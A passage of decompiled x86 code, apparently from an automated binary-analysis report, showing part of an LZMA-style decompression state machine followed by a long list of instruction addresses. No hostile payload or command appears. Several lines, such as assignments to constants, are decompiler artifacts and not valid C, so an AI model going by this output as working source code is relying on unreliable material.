											_t334 = __ebp - 0x70;
											 *_t334 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t334;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											__eax =  *(__ebp - 0x2c);
											goto L101;
										case 0xd:
											L37:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xd;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t122 = __ebp - 0x70;
											 *_t122 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t122;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											L39:
											__eax =  *(__ebp - 0x40);
											__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
											if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
												goto L48;
											}
											__eflags = __ebx - 0x100;
											if(__ebx >= 0x100) {
												goto L54;
											}
											L41:
											__eax =  *(__ebp - 0x5b) & 0x000000ff;
											 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
											__ecx =  *(__ebp - 0x58);
											__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
											 *(__ebp - 0x48) = __eax;
											__eax = __eax + 1;
											__eax = __eax << 8;
											__eax = __eax + __ebx;
											__esi =  *(__ebp - 0x58) + __eax * 2;
											 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
											__ax =  *__esi;
											 *(__ebp - 0x54) = __esi;
											__edx = __ax & 0x0000ffff;
											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
											__eflags =  *(__ebp - 0xc) - __ecx;
											if( *(__ebp - 0xc) >= __ecx) {
												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
												__cx = __ax;
												 *(__ebp - 0x40) = 1;
												__cx = __ax >> 5;
												__eflags = __eax;
												__ebx = __ebx + __ebx + 1;
												 *__esi = __ax;
											} else {
												 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
												 *(__ebp - 0x10) = __ecx;
												0x800 = 0x800 - __edx;
												0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
												__ebx = __ebx + __ebx;
												 *__esi = __cx;
											}
											__eflags =  *(__ebp - 0x10) - 0x1000000;
											 *(__ebp - 0x44) = __ebx;
											if( *(__ebp - 0x10) >= 0x1000000) {
												goto L39;
											} else {
												goto L37;
											}
										case 0xe:
											L46:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xe;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t156 = __ebp - 0x70;
											 *_t156 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t156;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											while(1) {
												L48:
												__eflags = __ebx - 0x100;
												if(__ebx >= 0x100) {
													break;
												}
												__eax =  *(__ebp - 0x58);
												__edx = __ebx + __ebx;
												__ecx =  *(__ebp - 0x10);
												__esi = __edx + __eax;
												__ecx =  *(__ebp - 0x10) >> 0xb;
												__ax =  *__esi;
												 *(__ebp - 0x54) = __esi;
												__edi = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													_t170 = __edx + 1; // 0x1
													__ebx = _t170;
													__cx = __ax >> 5;
													__eflags = __eax;
													 *__esi = __ax;
												} else {
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edi;
													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
													__ebx = __ebx + __ebx;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0x10) >= 0x1000000) {
													continue;
												} else {
													goto L46;
												}
											}
											L54:
											_t173 = __ebp - 0x34;
											 *_t173 =  *(__ebp - 0x34) & 0x00000000;
											__eflags =  *_t173;
											goto L55;
										case 0xf:
											L58:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xf;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t203 = __ebp - 0x70;
											 *_t203 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t203;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											L60:
											__eflags = __ebx - 0x100;
											if(__ebx >= 0x100) {
												L55:
												__al =  *(__ebp - 0x44);
												 *(__ebp - 0x5c) =  *(__ebp - 0x44);
												goto L56;
											}
											L61:
											__eax =  *(__ebp - 0x58);
											__edx = __ebx + __ebx;
											__ecx =  *(__ebp - 0x10);
											__esi = __edx + __eax;
											__ecx =  *(__ebp - 0x10) >> 0xb;
											__ax =  *__esi;
											 *(__ebp - 0x54) = __esi;
											__edi = __ax & 0x0000ffff;
											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
											__eflags =  *(__ebp - 0xc) - __ecx;
											if( *(__ebp - 0xc) >= __ecx) {
												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
												__cx = __ax;
												_t217 = __edx + 1; // 0x1
												__ebx = _t217;
												__cx = __ax >> 5;
												__eflags = __eax;
												 *__esi = __ax;
											} else {
												 *(__ebp - 0x10) = __ecx;
												0x800 = 0x800 - __edi;
												0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
												__ebx = __ebx + __ebx;
												 *__esi = __cx;
											}
											__eflags =  *(__ebp - 0x10) - 0x1000000;
											 *(__ebp - 0x44) = __ebx;
											if( *(__ebp - 0x10) >= 0x1000000) {
												goto L60;
											} else {
												goto L58;
											}
										case 0x10:
											L109:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0x10;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t365 = __ebp - 0x70;
											 *_t365 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t365;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											goto L111;
										case 0x11:
											L69:
											__esi =  *(__ebp - 0x58);
											 *(__ebp - 0x84) = 0x12;
											while(1) {
												 *(_t613 - 0x54) = _t606;
												goto L133;
											}
										case 0x12:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__eax =  *(__ebp - 0x58);
												 *(__ebp - 0x84) = 0x13;
												__esi =  *(__ebp - 0x58) + 2;
												while(1) {
													 *(_t613 - 0x54) = _t606;
													goto L133;
												}
											}
											__eax =  *(__ebp - 0x4c);
											 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
											__ecx =  *(__ebp - 0x58);
											__eax =  *(__ebp - 0x4c) << 4;
											__eflags = __eax;
											__eax =  *(__ebp - 0x58) + __eax + 4;
											goto L130;
										case 0x13:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												_t469 = __ebp - 0x58;
												 *_t469 =  *(__ebp - 0x58) + 0x204;
												__eflags =  *_t469;
												 *(__ebp - 0x30) = 0x10;
												 *(__ebp - 0x40) = 8;
												L144:
												 *(__ebp - 0x7c) = 0x14;
												goto L145;
											}
											__eax =  *(__ebp - 0x4c);
											__ecx =  *(__ebp - 0x58);
											__eax =  *(__ebp - 0x4c) << 4;
											 *(__ebp - 0x30) = 8;
											__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
											L130:
											 *(__ebp - 0x58) = __eax;
											 *(__ebp - 0x40) = 3;
											goto L144;
										case 0x14:
											 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
											__eax =  *(__ebp - 0x80);
											 *(_t613 - 0x88) = _t533;
											goto L1;
										case 0x15:
											__eax = 0;
											__eflags =  *(__ebp - 0x38) - 7;
											0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
											__al = __al & 0x000000fd;
											__eax = (__eflags >= 0) - 1 + 0xb;
											 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
											goto L120;
										case 0x16:
											__eax =  *(__ebp - 0x30);
											__eflags = __eax - 4;
											if(__eax >= 4) {
												_push(3);
												_pop(__eax);
											}
											__ecx =  *(__ebp - 4);
											 *(__ebp - 0x40) = 6;
											__eax = __eax << 7;
											 *(__ebp - 0x7c) = 0x19;
											 *(__ebp - 0x58) = __eax;
											goto L145;
										case 0x17:
											L145:
											__eax =  *(__ebp - 0x40);
											 *(__ebp - 0x50) = 1;
											 *(__ebp - 0x48) =  *(__ebp - 0x40);
											goto L149;
										case 0x18:
											L146:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0x18;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t484 = __ebp - 0x70;
											 *_t484 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t484;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											L148:
											_t487 = __ebp - 0x48;
											 *_t487 =  *(__ebp - 0x48) - 1;
											__eflags =  *_t487;
											L149:
											__eflags =  *(__ebp - 0x48);
											if( *(__ebp - 0x48) <= 0) {
												__ecx =  *(__ebp - 0x40);
												__ebx =  *(__ebp - 0x50);
												0 = 1;
												__eax = 1 << __cl;
												__ebx =  *(__ebp - 0x50) - (1 << __cl);
												__eax =  *(__ebp - 0x7c);
												 *(__ebp - 0x44) = __ebx;
												while(1) {
													 *(_t613 - 0x88) = _t533;
													goto L1;
												}
											}
											__eax =  *(__ebp - 0x50);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
											__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
											__eax =  *(__ebp - 0x58);
											__esi = __edx + __eax;
											 *(__ebp - 0x54) = __esi;
											__ax =  *__esi;
											__edi = __ax & 0x0000ffff;
											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
											__eflags =  *(__ebp - 0xc) - __ecx;
											if( *(__ebp - 0xc) >= __ecx) {
												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
												__cx = __ax;
												__cx = __ax >> 5;
												__eax = __eax - __ecx;
												__edx = __edx + 1;
												__eflags = __edx;
												 *__esi = __ax;
												 *(__ebp - 0x50) = __edx;
											} else {
												 *(__ebp - 0x10) = __ecx;
												0x800 = 0x800 - __edi;
												0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
												 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
												 *__esi = __cx;
											}
											__eflags =  *(__ebp - 0x10) - 0x1000000;
											if( *(__ebp - 0x10) >= 0x1000000) {
												goto L148;
											} else {
												goto L146;
											}
										case 0x19:
											__eflags = __ebx - 4;
											if(__ebx < 4) {
												 *(__ebp - 0x2c) = __ebx;
												L119:
												_t393 = __ebp - 0x2c;
												 *_t393 =  *(__ebp - 0x2c) + 1;
												__eflags =  *_t393;
												L120:
												__eax =  *(__ebp - 0x2c);
												__eflags = __eax;
												if(__eax == 0) {
													 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
													goto L170;
												}
												__eflags = __eax -  *(__ebp - 0x60);
												if(__eax >  *(__ebp - 0x60)) {
													goto L171;
												}
												 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
												__eax =  *(__ebp - 0x30);
												_t400 = __ebp - 0x60;
												 *_t400 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
												__eflags =  *_t400;
												goto L123;
											}
											__ecx = __ebx;
											__eax = __ebx;
											__ecx = __ebx >> 1;
											__eax = __ebx & 0x00000001;
											__ecx = (__ebx >> 1) - 1;
											__al = __al | 0x00000002;
											__eax = (__ebx & 0x00000001) << __cl;
											__eflags = __ebx - 0xe;
											 *(__ebp - 0x2c) = __eax;
											if(__ebx >= 0xe) {
												__ebx = 0;
												 *(__ebp - 0x48) = __ecx;
												L102:
												__eflags =  *(__ebp - 0x48);
												if( *(__ebp - 0x48) <= 0) {
													__eax = __eax + __ebx;
													 *(__ebp - 0x40) = 4;
													 *(__ebp - 0x2c) = __eax;
													__eax =  *(__ebp - 4);
													__eax =  *(__ebp - 4) + 0x644;
													__eflags = __eax;
													L108:
													__ebx = 0;
													 *(__ebp - 0x58) = __eax;
													 *(__ebp - 0x50) = 1;
													 *(__ebp - 0x44) = 0;
													 *(__ebp - 0x48) = 0;
													L112:
													__eax =  *(__ebp - 0x40);
													__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
													if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
														_t391 = __ebp - 0x2c;
														 *_t391 =  *(__ebp - 0x2c) + __ebx;
														__eflags =  *_t391;
														goto L119;
													}
													__eax =  *(__ebp - 0x50);
													 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
													__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
													__eax =  *(__ebp - 0x58);
													__esi = __edi + __eax;
													 *(__ebp - 0x54) = __esi;
													__ax =  *__esi;
													__ecx = __ax & 0x0000ffff;
													__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
													__eflags =  *(__ebp - 0xc) - __edx;
													if( *(__ebp - 0xc) >= __edx) {
														__ecx = 0;
														 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
														__ecx = 1;
														 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
														__ebx = 1;
														__ecx =  *(__ebp - 0x48);
														__ebx = 1 << __cl;
														__ecx = 1 << __cl;
														__ebx =  *(__ebp - 0x44);
														__ebx =  *(__ebp - 0x44) | __ecx;
														__cx = __ax;
														__cx = __ax >> 5;
														__eax = __eax - __ecx;
														__edi = __edi + 1;
														__eflags = __edi;
														 *(__ebp - 0x44) = __ebx;
														 *__esi = __ax;
														 *(__ebp - 0x50) = __edi;
													} else {
														 *(__ebp - 0x10) = __edx;
														0x800 = 0x800 - __ecx;
														0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
														 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
														 *__esi = __dx;
													}
													__eflags =  *(__ebp - 0x10) - 0x1000000;
													if( *(__ebp - 0x10) >= 0x1000000) {
														L111:
														_t368 = __ebp - 0x48;
														 *_t368 =  *(__ebp - 0x48) + 1;
														__eflags =  *_t368;
														goto L112;
													} else {
														goto L109;
													}
												}
												__ecx =  *(__ebp - 0xc);
												__ebx = __ebx + __ebx;
												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
												__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
													__ecx =  *(__ebp - 0x10);
													 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
													__ebx = __ebx | 0x00000001;
													__eflags = __ebx;
													 *(__ebp - 0x44) = __ebx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												if( *(__ebp - 0x10) >= 0x1000000) {
													L101:
													_t338 = __ebp - 0x48;
													 *_t338 =  *(__ebp - 0x48) - 1;
													__eflags =  *_t338;
													goto L102;
												} else {
													goto L99;
												}
											}
											__edx =  *(__ebp - 4);
											__eax = __eax - __ebx;
											 *(__ebp - 0x40) = __ecx;
											__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
											goto L108;
										case 0x1a:
											L56:
											__eflags =  *(__ebp - 0x64);
											if( *(__ebp - 0x64) == 0) {
												 *(__ebp - 0x88) = 0x1a;
												goto L170;
											}
											__ecx =  *(__ebp - 0x68);
											__al =  *(__ebp - 0x5c);
											__edx =  *(__ebp - 8);
											 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
											 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
											 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
											 *( *(__ebp - 0x68)) = __al;
											__ecx =  *(__ebp - 0x14);
											 *(__ecx +  *(__ebp - 8)) = __al;
											__eax = __ecx + 1;
											__edx = 0;
											_t192 = __eax %  *(__ebp - 0x74);
											__eax = __eax /  *(__ebp - 0x74);
											__edx = _t192;
											goto L79;
										case 0x1b:
											L75:
											__eflags =  *(__ebp - 0x64);
											if( *(__ebp - 0x64) == 0) {
												 *(__ebp - 0x88) = 0x1b;
												goto L170;
											}
											__eax =  *(__ebp - 0x14);
											__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
											__eflags = __eax -  *(__ebp - 0x74);
											if(__eax >=  *(__ebp - 0x74)) {
												__eax = __eax +  *(__ebp - 0x74);
												__eflags = __eax;
											}
											__edx =  *(__ebp - 8);
											__cl =  *(__eax + __edx);
											__eax =  *(__ebp - 0x14);
											 *(__ebp - 0x5c) = __cl;
											 *(__eax + __edx) = __cl;
											__eax = __eax + 1;
											__edx = 0;
											_t274 = __eax %  *(__ebp - 0x74);
											__eax = __eax /  *(__ebp - 0x74);
											__edx = _t274;
											__eax =  *(__ebp - 0x68);
											 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
											 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
											_t283 = __ebp - 0x64;
											 *_t283 =  *(__ebp - 0x64) - 1;
											__eflags =  *_t283;
											 *( *(__ebp - 0x68)) = __cl;
											L79:
											 *(__ebp - 0x14) = __edx;
											goto L80;
										case 0x1c:
											while(1) {
												L123:
												__eflags =  *(__ebp - 0x64);
												if( *(__ebp - 0x64) == 0) {
													break;
												}
												__eax =  *(__ebp - 0x14);
												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
												__eflags = __eax -  *(__ebp - 0x74);
												if(__eax >=  *(__ebp - 0x74)) {
													__eax = __eax +  *(__ebp - 0x74);
													__eflags = __eax;
												}
												__edx =  *(__ebp - 8);
												__cl =  *(__eax + __edx);
												__eax =  *(__ebp - 0x14);
												 *(__ebp - 0x5c) = __cl;
												 *(__eax + __edx) = __cl;
												__eax = __eax + 1;
												__edx = 0;
												_t414 = __eax %  *(__ebp - 0x74);
												__eax = __eax /  *(__ebp - 0x74);
												__edx = _t414;
												__eax =  *(__ebp - 0x68);
												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
												 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
												 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
												__eflags =  *(__ebp - 0x30);
												 *( *(__ebp - 0x68)) = __cl;
												 *(__ebp - 0x14) = _t414;
												if( *(__ebp - 0x30) > 0) {
													continue;
												} else {
													L80:
													 *(__ebp - 0x88) = 2;
													goto L1;
												}
											}
											 *(__ebp - 0x88) = 0x1c;
											goto L170;
									}
								}
								L171:
								_t535 = _t534 | 0xffffffff;
								goto L172;
							}
						}
					}
				}
			}

0x00000000
0x00406b4f
0x00406b4f
0x00406b53
0x00406b7c
0x00406b86
0x00406b55
0x00406b5e
0x00406b6b
0x00406b6e
0x00406eb2
0x00406eb2
0x00406eb5
0x00406eb5
0x00406eb5
0x00406ebb
0x00406ec1
0x00406ec7
0x00406ee1
0x00406ee4
0x00406eea
0x00406ef5
0x00406ef7
0x00406ec9
0x00406ec9
0x00406ed8
0x00406edc
0x00406edc
0x00406f01
0x00000000
0x00000000
0x00406f03
0x00406f07
0x004070b6
0x004070cc
0x004070d4
0x004070db
0x004070dd
0x004070e4
0x004070e8
0x004070e8
0x00406f13
0x00406f1a
0x00406f22
0x00406f25
0x00406f28
0x00406f28
0x00406f2e
0x00406f2e
0x004066ca
0x004066ca
0x004066ca
0x004066d3
0x00000000
0x00000000
0x004066d9
0x00000000
0x004066e4
0x00000000
0x00000000
0x004066ed
0x004066f0
0x004066f3
0x004066f7
0x00000000
0x00000000
0x004066fd
0x00406700
0x00406702
0x00406703
0x00406706
0x00406708
0x00406709
0x0040670b
0x0040670e
0x00406713
0x00406718
0x00406721
0x00406734
0x00406737
0x00406743
0x0040676b
0x0040676d
0x0040677b
0x0040677b
0x0040677f
0x00000000
0x00000000
0x00000000
0x00000000
0x0040676f
0x0040676f
0x00406772
0x00406773
0x00406773
0x00000000
0x0040676f
0x00406749
0x0040674e
0x0040674e
0x00406757
0x0040675f
0x00406762
0x00000000
0x00406768
0x00406768
0x00000000
0x00406768
0x00000000
0x00406785
0x00406785
0x00406789
0x00407035
0x00000000
0x00407035
0x00406792
0x004067a2
0x004067a5
0x004067a8
0x004067a8
0x004067a8
0x004067ab
0x004067af
0x00000000
0x00000000
0x004067b1
0x004067b7
0x004067e1
0x004067e7
0x004067ee
0x00000000
0x004067ee
0x004067bd
0x004067c0
0x004067c5
0x004067c5
0x004067d0
0x004067d8
0x004067db
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00406820
0x00406826
0x00406829
0x00406836
0x0040683e
0x00406eb2
0x00000000
0x00000000
0x004067f5
0x004067f5
0x004067f9
0x00407044
0x00000000
0x00407044
0x00406805
0x00406810
0x00406810
0x00406810
0x00406813
0x00406816
0x00406819
0x0040681e
0x00000000
0x00000000
0x00000000
0x00000000
0x00406eb5
0x00406eb5
0x00406ebb
0x00406ec1
0x00406ec7
0x00406ee1
0x00406ee4
0x00406eea
0x00406ef5
0x00406ef7
0x00406ec9
0x00406ec9
0x00406ed8
0x00406edc
0x00406edc
0x00406f01
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00406846
0x00406848
0x0040684b
0x004068bc
0x004068bf
0x004068c2
0x004068c9
0x004068d3
0x00406eb2
0x00406eb2
0x00000000
0x00406eb2
0x00406eb2
0x0040684d
0x00406851
0x00406854
0x00406856
0x00406859
0x0040685c
0x0040685e
0x00406861
0x00406863
0x00406868
0x0040686b
0x0040686e
0x00406872
0x00406879
0x0040687c
0x00406883
0x00406887
0x0040688f
0x0040688f
0x0040688f
0x00406889
0x00406889
0x00406889
0x0040687e
0x0040687e
0x0040687e
0x00406893
0x00406896
0x004068b4
0x004068b6
0x00000000
0x00406898
0x00406898
0x0040689b
0x0040689e
0x004068a1
0x004068a3
0x004068a3
0x004068a3
0x004068a6
0x004068a9
0x004068ab
0x004068ac
0x004068af
0x00000000
0x004068af
0x00000000
0x00406ae5
0x00406ae9
0x00406b07
0x00406b0a
0x00406b11
0x00406b14
0x00406b17
0x00406b1a
0x00406b1d
0x00406b20
0x00406b22
0x00406b29
0x00406b2a
0x00406b2c
0x00406b2f
0x00406b32
0x00406b35
0x00406b35
0x00406b3a
0x00000000
0x00406b3a
0x00406aeb
0x00406aee
0x00406af1
0x00406afb
0x00406eb2
0x00406eb2
0x00000000
0x00406eb2
0x00000000
0x00000000
0x00000000
0x00406b92
0x00406b96
0x00000000
0x00000000
0x00406b9c
0x00406ba0
0x00000000
0x00000000
0x00406ba6
0x00406ba8
0x00406bac
0x00406bac
0x00406baf
0x00406bb3
0x00000000
0x00000000
0x00406c03
0x00406c07
0x00406c0e
0x00406c11
0x00406c14
0x00406c1e
0x00406eb2
0x00406eb2
0x00000000
0x00406eb2
0x00406eb2
0x00406c09
0x00000000
0x00000000
0x00406c2a
0x00406c2e
0x00406c35
0x00406c38
0x00406c3b
0x00406c30
0x00406c30
0x00406c30
0x00406c3e
0x00406c41
0x00406c44
0x00406c44
0x00406c47
0x00406c4a
0x00406c4d
0x00406c4d
0x00406c50
0x00406c57
0x00406c5c
0x00000000
0x00000000
0x00406cea
0x00406cea
0x00406cee
0x0040708c
0x00000000
0x0040708c
0x00406cf4
0x00406cf7
0x00406cfa
0x00406cfe
0x00406d01
0x00406d07
0x00406d09
0x00406d09
0x00406d09
0x00406d0c
0x00406d0f
0x00000000
0x00000000
0x004068df
0x004068df
0x004068e3
0x00407050
0x00000000
0x00407050
0x004068e9
0x004068ec
0x004068ef
0x004068f3
0x004068f6
0x004068fc
0x004068fe
0x004068fe
0x004068fe
0x00406901
0x00406904
0x00406904
0x00406907
0x0040690a
0x00000000
0x00000000
0x00406910
0x00406916
0x00000000
0x00000000
0x0040691c
0x0040691c
0x00406920
0x00406923
0x00406926
0x00406929
0x0040692c
0x0040692d
0x00406930
0x00406932
0x00406938
0x0040693b
0x0040693e
0x00406941
0x00406944
0x00406947
0x0040694a
0x00406966
0x00406969
0x0040696c
0x0040696f
0x00406976
0x0040697a
0x0040697c
0x00406980
0x0040694c
0x0040694c
0x00406950
0x00406958
0x0040695d
0x0040695f
0x00406961
0x00406961
0x00406983
0x0040698a
0x0040698d
0x00000000
0x00406993
0x00000000
0x00406993
0x00000000
0x00406998
0x00406998
0x0040699c
0x0040705c
0x00000000
0x0040705c
0x004069a2
0x004069a5
0x004069a8
0x004069ac
0x004069af
0x004069b5
0x004069b7
0x004069b7
0x004069b7
0x004069ba
0x004069bd
0x004069bd
0x004069bd
0x004069c3
0x00000000
0x00000000
0x004069c5
0x004069c8
0x004069cb
0x004069ce
0x004069d1
0x004069d4
0x004069d7
0x004069da
0x004069dd
0x004069e0
0x004069e3
0x004069fb
0x004069fe
0x00406a01
0x00406a04
0x00406a04
0x00406a07
0x00406a0b
0x00406a0d
0x004069e5
0x004069e5
0x004069ed
0x004069f2
0x004069f4
0x004069f6
0x004069f6
0x00406a10
0x00406a17
0x00406a1a
0x00000000
0x00406a1c
0x00000000
0x00406a1c
0x00406a1a
0x00406a21
0x00406a21
0x00406a21
0x00406a21
0x00000000
0x00000000
0x00406a5c
0x00406a5c
0x00406a60
0x00407068
0x00000000
0x00407068
0x00406a66
0x00406a69
0x00406a6c
0x00406a70
0x00406a73
0x00406a79
0x00406a7b
0x00406a7b
0x00406a7b
0x00406a7e
0x00406a81
0x00406a81
0x00406a87
0x00406a25
0x00406a25
0x00406a28
0x00000000
0x00406a28
0x00406a89
0x00406a89
0x00406a8c
0x00406a8f
0x00406a92
0x00406a95
0x00406a98
0x00406a9b
0x00406a9e
0x00406aa1
0x00406aa4
0x00406aa7
0x00406abf
0x00406ac2
0x00406ac5
0x00406ac8
0x00406ac8
0x00406acb
0x00406acf
0x00406ad1
0x00406aa9
0x00406aa9
0x00406ab1
0x00406ab6
0x00406ab8
0x00406aba
0x00406aba
0x00406ad4
0x00406adb
0x00406ade
0x00000000
0x00406ae0
0x00000000
0x00406ae0
0x00000000
0x00406d6d
0x00406d6d
0x00406d71
0x00407098
0x00000000
0x00407098
0x00406d77
0x00406d7a
0x00406d7d
0x00406d81
0x00406d84
0x00406d8a
0x00406d8c
0x00406d8c
0x00406d8c
0x00406d8f
0x00000000
0x00000000
0x00406b3d
0x00406b3d
0x00406b40
0x00406eb2
0x00406eb2
0x00000000
0x00406eb2
0x00000000
0x00406e7c
0x00406e80
0x00406ea2
0x00406ea5
0x00406eaf
0x00406eb2
0x00406eb2
0x00000000
0x00406eb2
0x00406eb2
0x00406e82
0x00406e85
0x00406e89
0x00406e8c
0x00406e8c
0x00406e8f
0x00000000
0x00000000
0x00406f39
0x00406f3d
0x00406f5b
0x00406f5b
0x00406f5b
0x00406f62
0x00406f69
0x00406f70
0x00406f70
0x00000000
0x00406f70
0x00406f3f
0x00406f42
0x00406f45
0x00406f48
0x00406f4f
0x00406e93
0x00406e93
0x00406e96
0x00000000
0x00000000
0x0040702a
0x0040702d
0x00406f2e
0x00000000
0x00000000
0x00406c64
0x00406c66
0x00406c6d
0x00406c6e
